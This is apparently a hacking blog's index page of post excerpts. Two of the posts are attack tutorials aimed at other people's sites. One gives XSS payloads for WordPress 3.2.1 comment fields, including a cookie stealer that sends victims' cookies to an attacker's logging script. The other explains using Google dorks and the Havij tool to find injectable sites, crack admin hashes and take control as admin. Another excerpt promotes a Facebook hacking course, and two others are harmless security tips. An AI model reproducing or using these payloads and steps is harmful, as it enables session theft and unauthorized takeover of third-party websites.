XSS Injection Vulnerability in WordPress 3.2.1

Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

Read more »

How to Secure your Facebook Account

In the past few years a lot of social apps have been developed which has changed our life completely. Now a days, we have 2 lives, one which is the actual physical life and the other is a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by any stupid hacker and used for their own benefit.

According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.
Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.

Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.
Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”
Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.

Read more »

6 Tips to Avoid Facebook Viruses and Spam Messages

Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

Read more »

SQL Injection Using Havij

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
  
• Now open Havij and paste the link without ‘
  
  
• Now we have to find the columns of the database.
  
  
• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Read more »

How to Secure your Private Folders

Do you have any private stuff that you would to hide from your friends and relatives? Would you want it to be Invisible so that it remains unnoticed by the normal users? But there are software which can display all the folders that are present on the Disk. So What if you can even  password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. But you might think that you may need to have a software for that. Well here is a way to do that without using any additional software and you can show off in front of your friends by making their folders invisible as well as password protected. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder

1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

2. Now in this folder place all the important files, documents or any folders that you want to password protect.

3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.

4. Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

6. Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

1. Now Right-click on this password protected folder and select Properties.

2. At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).

3. In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

• Do not show hidden files and folders
• Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

Read more »